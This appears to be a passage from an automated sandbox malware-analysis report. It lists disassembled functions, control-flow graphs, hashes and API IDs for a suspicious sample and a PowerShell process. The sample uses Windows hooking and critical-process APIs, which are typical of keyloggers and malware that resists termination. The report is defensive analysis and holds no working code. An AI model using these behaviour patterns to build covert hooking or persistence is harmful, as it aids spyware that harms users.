                                                                      • Instruction ID: cd7553e12d33d459a95f447b738d3ff3091d7bafe3b50c4c5530dab8f71f7a0d
                                                                      • Opcode Fuzzy Hash: 157871a218a551e3f179c196cb3c822ada692e7dc732850c4b93af4d39d79313
                                                                      • Instruction Fuzzy Hash: 7242E261F1CA4A4FEBA9EB6C84A537973D2EF9A310F540579E44ED32D2CE2DAC418341
                                                                      Function 00007FFD34568DF6 Relevance: .5, Instructions: 470COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 802 7ffd34568df6-7ffd34568e03 803 7ffd34568e0e-7ffd34568ed7 802->803 804 7ffd34568e05-7ffd34568e0d 802->804 808 7ffd34568f43 803->808 809 7ffd34568ed9-7ffd34568ee2 803->809 804->803 810 7ffd34568f45-7ffd34568f6a 808->810 809->808 811 7ffd34568ee4-7ffd34568ef0 809->811 818 7ffd34568f6c-7ffd34568f75 810->818 819 7ffd34568fd6 810->819 812 7ffd34568ef2-7ffd34568f04 811->812 813 7ffd34568f29-7ffd34568f41 811->813 814 7ffd34568f08-7ffd34568f1b 812->814 815 7ffd34568f06 812->815 813->810 814->814 817 7ffd34568f1d-7ffd34568f25 814->817 815->814 817->813 818->819 821 7ffd34568f77-7ffd34568f83 818->821 820 7ffd34568fd8-7ffd34569080 819->820 832 7ffd34569082-7ffd3456908c 820->832 833 7ffd345690ee 820->833 822 7ffd34568fbc-7ffd34568fd4 821->822 823 7ffd34568f85-7ffd34568f97 821->823 822->820 825 7ffd34568f9b-7ffd34568fae 823->825 826 7ffd34568f99 823->826 825->825 828 7ffd34568fb0-7ffd34568fb8 825->828 826->825 828->822 832->833 835 7ffd3456908e-7ffd3456909b 832->835 834 7ffd345690f0-7ffd34569119 833->834 841 7ffd34569183 834->841 842 7ffd3456911b-7ffd34569126 834->842 836 7ffd345690d4-7ffd345690ec 835->836 837 7ffd3456909d-7ffd345690af 835->837 836->834 839 7ffd345690b3-7ffd345690c6 837->839 840 7ffd345690b1 837->840 839->839 843 7ffd345690c8-7ffd345690d0 839->843 840->839 845 7ffd34569185-7ffd34569216 841->845 842->841 844 7ffd34569128-7ffd34569136 842->844 843->836 846 7ffd3456916f-7ffd34569181 844->846 847 7ffd34569138-7ffd3456914a 844->847 853 7ffd3456921c-7ffd3456922b 845->853 846->845 848 7ffd3456914e-7ffd34569161 847->848 849 7ffd3456914c 847->849 848->848 851 7ffd34569163-7ffd3456916b 848->851 849->848 851->846 854 7ffd34569233-7ffd34569298 call 7ffd345692b4 853->854 855 7ffd3456922d 853->855 862 7ffd3456929f-7ffd345692b2 854->862 863 7ffd3456929a 854->863 855->854 863->862
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f7fedfa83db8d4b075f2485dd57d7f98f97cfba1a47fc75285efe453ff95cc2a
                                                                      • Instruction ID: 60627fd038b12e5c7f53d638814f4eca8ce37b4981b9cd519e652d0e5cc04523
                                                                      • Opcode Fuzzy Hash: f7fedfa83db8d4b075f2485dd57d7f98f97cfba1a47fc75285efe453ff95cc2a
                                                                      • Instruction Fuzzy Hash: 9CF1A430A0CA8D8FEBA9DF28C8557E977E1FF55310F04426EE84DC7291DB7899458B82
                                                                      Function 00007FFD34569BA2 Relevance: .5, Instructions: 456COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 864 7ffd34569ba2-7ffd34569baf 865 7ffd34569bb1-7ffd34569bb9 864->865 866 7ffd34569bba-7ffd34569c87 864->866 865->866 870 7ffd34569cf3 866->870 871 7ffd34569c89-7ffd34569c92 866->871 872 7ffd34569cf5-7ffd34569d1a 870->872 871->870 873 7ffd34569c94-7ffd34569ca0 871->873 880 7ffd34569d1c-7ffd34569d25 872->880 881 7ffd34569d86 872->881 874 7ffd34569ca2-7ffd34569cb4 873->874 875 7ffd34569cd9-7ffd34569cf1 873->875 876 7ffd34569cb8-7ffd34569ccb 874->876 877 7ffd34569cb6 874->877 875->872 876->876 879 7ffd34569ccd-7ffd34569cd5 876->879 877->876 879->875 880->881 883 7ffd34569d27-7ffd34569d33 880->883 882 7ffd34569d88-7ffd34569dad 881->882 889 7ffd34569daf-7ffd34569db9 882->889 890 7ffd34569e1b 882->890 884 7ffd34569d6c-7ffd34569d84 883->884 885 7ffd34569d35-7ffd34569d47 883->885 884->882 887 7ffd34569d4b-7ffd34569d5e 885->887 888 7ffd34569d49 885->888 887->887 891 7ffd34569d60-7ffd34569d68 887->891 888->887 889->890 892 7ffd34569dbb-7ffd34569dc8 889->892 893 7ffd34569e1d-7ffd34569e4b 890->893 891->884 894 7ffd34569e01-7ffd34569e19 892->894 895 7ffd34569dca-7ffd34569ddc 892->895 900 7ffd34569e4d-7ffd34569e58 893->900 901 7ffd34569ebb 893->901 894->893 896 7ffd34569de0-7ffd34569df3 895->896 897 7ffd34569dde 895->897 896->896 899 7ffd34569df5-7ffd34569dfd 896->899 897->896 899->894 900->901 903 7ffd34569e5a-7ffd34569e68 900->903 902 7ffd34569ebd-7ffd34569f95 901->902 913 7ffd34569f9b-7ffd34569faa 902->913 904 7ffd34569ea1-7ffd34569eb9 903->904 905 7ffd34569e6a-7ffd34569e7c 903->905 904->902 906 7ffd34569e80-7ffd34569e93 905->906 907 7ffd34569e7e 905->907 906->906 909 7ffd34569e95-7ffd34569e9d 906->909 907->906 909->904 914 7ffd34569fb2-7ffd3456a014 call 7ffd3456a030 913->914 915 7ffd34569fac 913->915 922 7ffd3456a01b-7ffd3456a02e 914->922 923 7ffd3456a016 914->923 915->914 923->922
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e67d62fc72712453bd62f79d26f2cda0e79bcbc484635199a8c21454018cea90
                                                                      • Instruction ID: 0c0b78b63cc08fb5bc1d2b8267efecaa3ff9ae21bd6530992a557ef939239ed4
                                                                      • Opcode Fuzzy Hash: e67d62fc72712453bd62f79d26f2cda0e79bcbc484635199a8c21454018cea90
                                                                      • Instruction Fuzzy Hash: 0DE1B530A08A8D8FEBA9DF28C8A57E977E1FF55311F04426ED84DC7295CF7899448B81
                                                                      Function 00007FFD34561959 Relevance: .2, Instructions: 209COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93eeebe9f82c596ff00c25ec5e4d8877d6b4e0248a8d678e4a2433275e275324
                                                                      • Instruction ID: cd67ceb7bb7c0e4013cf3825396d81c9e52a8bbb6b2a3e3e25cf1e4e52070557
                                                                      • Opcode Fuzzy Hash: 93eeebe9f82c596ff00c25ec5e4d8877d6b4e0248a8d678e4a2433275e275324
                                                                      • Instruction Fuzzy Hash: 5851FD21B1E6C90FE797AB7848742767FE49F8722AB0805FAE0C9C71A7DD4C5806C342
                                                                      Function 00007FFD34562E51 Relevance: 1.8, APIs: 1, Instructions: 266COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 393 7ffd34562e51-7ffd34562e55 394 7ffd34562e5a-7ffd34562e69 393->394 395 7ffd34562e57-7ffd34562e58 393->395 396 7ffd34562e6c-7ffd34562ed8 394->396 397 7ffd34562e6b 394->397 395->394 401 7ffd34562ee2-7ffd34562f14 396->401 402 7ffd34562eda-7ffd34562edf 396->402 397->396 404 7ffd34562f1c-7ffd34562f4f 401->404 405 7ffd34562f16 401->405 402->401 407 7ffd34562f51-7ffd34562f59 404->407 408 7ffd34562f5a-7ffd34562fcd 404->408 405->404 407->408 412 7ffd34562fd3-7ffd34562fe0 408->412 413 7ffd34563059-7ffd3456305d 408->413 414 7ffd34562fe2-7ffd3456301f SetWindowsHookExW 412->414 413->414 415 7ffd34563021 414->415 416 7ffd34563027-7ffd34563058 414->416 415->416
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID: HookWindows
                                                                      • String ID:
                                                                      • API String ID: 2559412058-0
                                                                      • Opcode ID: 1ec86b457bccb5d4946d5f47a2016a775f22d33f7b82c6f996dead9204f1e72c
                                                                      • Instruction ID: 9df1d96924dbf6ff0e6aa947f40c8b1cc796d6ebdc064fc459b39e8d53417185
                                                                      • Opcode Fuzzy Hash: 1ec86b457bccb5d4946d5f47a2016a775f22d33f7b82c6f996dead9204f1e72c
                                                                      • Instruction Fuzzy Hash: E5712731E0CA4C8FDB59EB68D8566F9BBE0EF56321F00427FD049D3192CB68A852C781
                                                                      Function 00007FFD345629FD Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 420 7ffd345629fd-7ffd34562ae0 RtlSetProcessIsCritical 424 7ffd34562ae2 420->424 425 7ffd34562ae8-7ffd34562b1d 420->425 424->425
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalProcess
                                                                      • String ID:
                                                                      • API String ID: 2695349919-0
                                                                      • Opcode ID: 83d86da1e05be9d00597b3905b58824658c229e44dd25f095469398ce8aaa7d9
                                                                      • Instruction ID: 11e2d5038360939f1273bb7555ee97af293df4be45f61ce182156a714b813604
                                                                      • Opcode Fuzzy Hash: 83d86da1e05be9d00597b3905b58824658c229e44dd25f095469398ce8aaa7d9
                                                                      • Instruction Fuzzy Hash: F141F63190C6488FD729DF98D855BE9BBF0FF56311F04416EE08AD3692CB786846CB91

                                                                      Non-executed Functions

                                                                      Function 00007FFD345654F2 Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: L_^
                                                                      • API String ID: 0-3811526842
                                                                      • Opcode ID: e45deb5469e2ab1d548628c5d7a8992356a39b55269ca45ad20415e5c50e54dd
                                                                      • Instruction ID: d99308ea52ea9f26750895ace4158026726ad3803d5952a0b8a63611a00f60be
                                                                      • Opcode Fuzzy Hash: e45deb5469e2ab1d548628c5d7a8992356a39b55269ca45ad20415e5c50e54dd
                                                                      • Instruction Fuzzy Hash: B131824BF4D7DA19E763656D78FA0E53F82DEA32F570910B3CA84C9053BC4D080B92A2
                                                                      Function 00007FFD345659ED Relevance: .5, Instructions: 542COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2aa3df20c843ab72bcf14f3a5fe9c5cb368cb7ea134ade00a02b101eab9069cd
                                                                      • Instruction ID: efea00588a89b6f76f5464de5ccee40f371ed83d7c675c0aedd1fa7619ea9732
                                                                      • Opcode Fuzzy Hash: 2aa3df20c843ab72bcf14f3a5fe9c5cb368cb7ea134ade00a02b101eab9069cd
                                                                      • Instruction Fuzzy Hash: C9F1E630A0CA4D8FDBA9DF68D8557E97BE1EF55321F04426EE44DC3292CA78A845CB81
                                                                      Function 00007FFD345675CD Relevance: .4, Instructions: 414COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 34d19a7033bf6996022b460e360dba8cb6dad40b06897cde7ad993d810ca3218
                                                                      • Instruction ID: 1149403b62acd3d80a05b436df54c9f86cbee05db180afda54f2adeb4e07f0c9
                                                                      • Opcode Fuzzy Hash: 34d19a7033bf6996022b460e360dba8cb6dad40b06897cde7ad993d810ca3218
                                                                      • Instruction Fuzzy Hash: 23C1B731E0CB4C4FDB19DBA898566EDBBE1EF96321F04426FD049D3292CE786845CB91
                                                                      Function 00007FFD34566AED Relevance: .4, Instructions: 370COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d9a9ce778527b9623b012ee08d823578937a8dfd4923160cd81a4955ea2696ed
                                                                      • Instruction ID: 8f1e4a0e5af5c83498dc71462f63e7bc9380d6862d6ae1f5bab40f3a171d95fd
                                                                      • Opcode Fuzzy Hash: d9a9ce778527b9623b012ee08d823578937a8dfd4923160cd81a4955ea2696ed
                                                                      • Instruction Fuzzy Hash: 1AC1D430A0DA4C8FDB69DB6888557E9BBB1FF56310F0442AED04DD3292CF78A945CB81
                                                                      Function 00007FFD345685F5 Relevance: .3, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3423392983.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd34560000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6c82367de3d0ab097d782e5abaf80b1964ce27828361dd3abfddaadfc842eead
                                                                      • Instruction ID: f889641d729ac335f53de0b691b457837170c57566e28e95d34143b68166c175
                                                                      • Opcode Fuzzy Hash: 6c82367de3d0ab097d782e5abaf80b1964ce27828361dd3abfddaadfc842eead
                                                                      • Instruction Fuzzy Hash: FC91D331E0DB4C4FDB19DBA898566F9BBF1EF56321F0441AED049D3292CE786846CB81

                                                                      Executed Functions

                                                                      Function 00007FFD3455644D Relevance: .7, Instructions: 735COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24188a3996086df7c7a18c4a3ce05bc4ceae1c7af4690fafb77cc4d8bfea62eb
                                                                      • Instruction ID: 3dabe6824ce913ed05fa874762d6bbabcd3a61ec5c8288f2a82bffad19b34164
                                                                      • Opcode Fuzzy Hash: 24188a3996086df7c7a18c4a3ce05bc4ceae1c7af4690fafb77cc4d8bfea62eb
                                                                      • Instruction Fuzzy Hash: 1DD16031E18A4D8FDF95DF58C495AA97BE1FF69300F1441AAD40ED7296CA38E841CB81
                                                                      Function 00007FFD3455947D Relevance: .5, Instructions: 503COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2e2d07917903f2d61e28afad92cde71a8d4b6912855fa50ae343034d30e92476
                                                                      • Instruction ID: 6bbe683cb3b35ad742bd7d40f48f72f1ec982fb72cda6047d698e39747947f25
                                                                      • Opcode Fuzzy Hash: 2e2d07917903f2d61e28afad92cde71a8d4b6912855fa50ae343034d30e92476
                                                                      • Instruction Fuzzy Hash: 99F1D862E0E6C64FE757966858B90B97FA0EF53214B0D01FBC18AC71D3DE0DE8068791
                                                                      Function 00007FFD3455A0D3 Relevance: .3, Instructions: 263COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cc785393f69e0641cb80c2d9c034ead446f20de1709eb1b4ed6ad3cf38a7a36f
                                                                      • Instruction ID: f63b29b2f07ccad8ea656a73699a654b91bf9a6dda7c68c57088a9c6aee1ed14
                                                                      • Opcode Fuzzy Hash: cc785393f69e0641cb80c2d9c034ead446f20de1709eb1b4ed6ad3cf38a7a36f
                                                                      • Instruction Fuzzy Hash: 33119872D1E7C84FD7539B2898A60B47F70EF63211B0901E7D589CB1A3D91D9C08C792
                                                                      Function 00007FFD34624073 Relevance: .2, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239909720.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e56cd4699c2ea4bb238a8cfc0cd314d86ce0a3a474908c1d5cafdfc11d651487
                                                                      • Instruction ID: 8c0ae918d972d8b147fac2724c8139e9db28f22541eeb8cda81e3af3d61a938f
                                                                      • Opcode Fuzzy Hash: e56cd4699c2ea4bb238a8cfc0cd314d86ce0a3a474908c1d5cafdfc11d651487
                                                                      • Instruction Fuzzy Hash: 87511832B0DAA61FE7A9DF1C54A55B477D2EF96390B1801BEC24DC7293DE29EC058341
                                                                      Function 00007FFD34624370 Relevance: .1, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239909720.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b36eee73ee2f198f57b63cbfc08754880616d0d6237c14d9b54e683f2390628f
                                                                      • Instruction ID: dca606a76dd00ee7155fa56f737d8744542a4ce4305e4e51499757dfbc175931
                                                                      • Opcode Fuzzy Hash: b36eee73ee2f198f57b63cbfc08754880616d0d6237c14d9b54e683f2390628f
                                                                      • Instruction Fuzzy Hash: D2412632B0DA991FEBA9DF2C64A16F57BD1EF86360B0801BAC14DC7193EA18EC008341
                                                                      Function 00007FFD34559758 Relevance: .1, Instructions: 129COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0a88a6c329bcd05dfd66260c07bfd3eb8aea8f73a2a22fe5c87c2a425491a8d3
                                                                      • Instruction ID: 499093608181945c9d21a57ebfebe719b77a72cb058205e48e0805a9409e6558
                                                                      • Opcode Fuzzy Hash: 0a88a6c329bcd05dfd66260c07bfd3eb8aea8f73a2a22fe5c87c2a425491a8d3
                                                                      • Instruction Fuzzy Hash: C331E97191CA488FDB589F5C984A6B97BE0FB99711F10412FE44AD3252DB34E816CBC2
                                                                      Function 00007FFD3443E620 Relevance: .1, Instructions: 124COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239156340.00007FFD3443D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3443D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd3443d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1d3d9d0c734bb6d8e5106408cd5c3a4a252d0c22728e2d6db590b543c13f7ade
                                                                      • Instruction ID: 80f08826f2446105be646c09a3ce65bd8393b0f492d324e798d36a8bc7ea2258
                                                                      • Opcode Fuzzy Hash: 1d3d9d0c734bb6d8e5106408cd5c3a4a252d0c22728e2d6db590b543c13f7ade
                                                                      • Instruction Fuzzy Hash: A641397140EBC48FE756DB3898559523FF0EF57320B1605EFE088CB1A7D629A846C792
                                                                      Function 00007FFD3455A62C Relevance: .1, Instructions: 100COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5c467ae4676f8f34538181b42de71f68ecdca64fca79dbdd2c9d11969c489380
                                                                      • Instruction ID: a579993dc91498ce67a2d8b1d67b542913d1f24e18f6e8d42a263fcc700cb334
                                                                      • Opcode Fuzzy Hash: 5c467ae4676f8f34538181b42de71f68ecdca64fca79dbdd2c9d11969c489380
                                                                      • Instruction Fuzzy Hash: DA21D63090CB488FEB59DFAC984A7F97BF0EB96321F04416BD049C3152DA74A856CB91
                                                                      Function 00007FFD346240BF Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239909720.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 861bc93c8a6aec091e56a407f53ca6ee28a8d449ea9800d5bde33c952f61e14a
                                                                      • Instruction ID: 50f9ac4368245aade89099c039a4578303d3c6d37672b20973f32ba1cdb7628c
                                                                      • Opcode Fuzzy Hash: 861bc93c8a6aec091e56a407f53ca6ee28a8d449ea9800d5bde33c952f61e14a
                                                                      • Instruction Fuzzy Hash: 32210132B0DAA61FE7A9CF1854F81B036D2EF66290B4901BAC25DD71A3CE2CEC049300
                                                                      Function 00007FFD346243BC Relevance: .1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239909720.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 47282fcb9fd19d85933a1c538be151a839d980c777dc9f37100432ff5efe4b9c
                                                                      • Instruction ID: d27d78fb7e9bac3c50844afeedc6ecbc86c0736b7d4443567ffa4c19be38042b
                                                                      • Opcode Fuzzy Hash: 47282fcb9fd19d85933a1c538be151a839d980c777dc9f37100432ff5efe4b9c
                                                                      • Instruction Fuzzy Hash: 3E11E032B0EAA55FE7A5DF1894B45F87BD1EF022A4B5900FAD65DC7092DA1CAC009341
                                                                      Function 00007FFD3462681E Relevance: .1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239909720.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34620000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1e291432f9823d9c24b8cb8fed1cd34315b6a2b6978b4d0d37c9d0b28d3a813d
                                                                      • Instruction ID: 7a2296a8027aef4534a57babf32ae7e3f8ec0b9d1cac2e53d784bf4420cafa55
                                                                      • Opcode Fuzzy Hash: 1e291432f9823d9c24b8cb8fed1cd34315b6a2b6978b4d0d37c9d0b28d3a813d
                                                                      • Instruction Fuzzy Hash: BB110231B0D7894FEB61DF9890A41A87BD1EF49310B0401BEC54DDB093CA2CA845C321
                                                                      Function 00007FFD345533B5 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                      • Instruction ID: d5890193d180fc2d010273fca3adca2fe335e6924b43b9623caa6d023ab94d49
                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                      • Instruction Fuzzy Hash: 8101447121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3665DA26E882CB45
                                                                      Function 00007FFD3455A2AA Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cc9e95e6afd5411fd832e312273e8543ef5e1d6a49bf30d2dab3ea73cdce5845
                                                                      • Instruction ID: 14c3cadb040e97b46e7127c5bc87646e0b7229242e9c1494978a4c0434e2a1c4
                                                                      • Opcode Fuzzy Hash: cc9e95e6afd5411fd832e312273e8543ef5e1d6a49bf30d2dab3ea73cdce5845
                                                                      • Instruction Fuzzy Hash: 48E04F35908A4C8F9F55EF18D85A4E97BE0FF6A311B10029BE90DC7120DB75D958CBC2

                                                                      Non-executed Functions

                                                                      Function 00007FFD34558BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2239533946.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ffd34550000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M_^4$M_^7$M_^F$M_^J
                                                                      • API String ID: 0-622050427
                                                                      • Opcode ID: bf57c2cae731ddb52a5131212f692e2bcd333364dcb22a9b0f5c87edce2c85bf
                                                                      • Instruction ID: 254e86c7b0adc0acb85ff32252b4d2b0edb7b79cc79ab8f08f9fc1dfbd20a36c
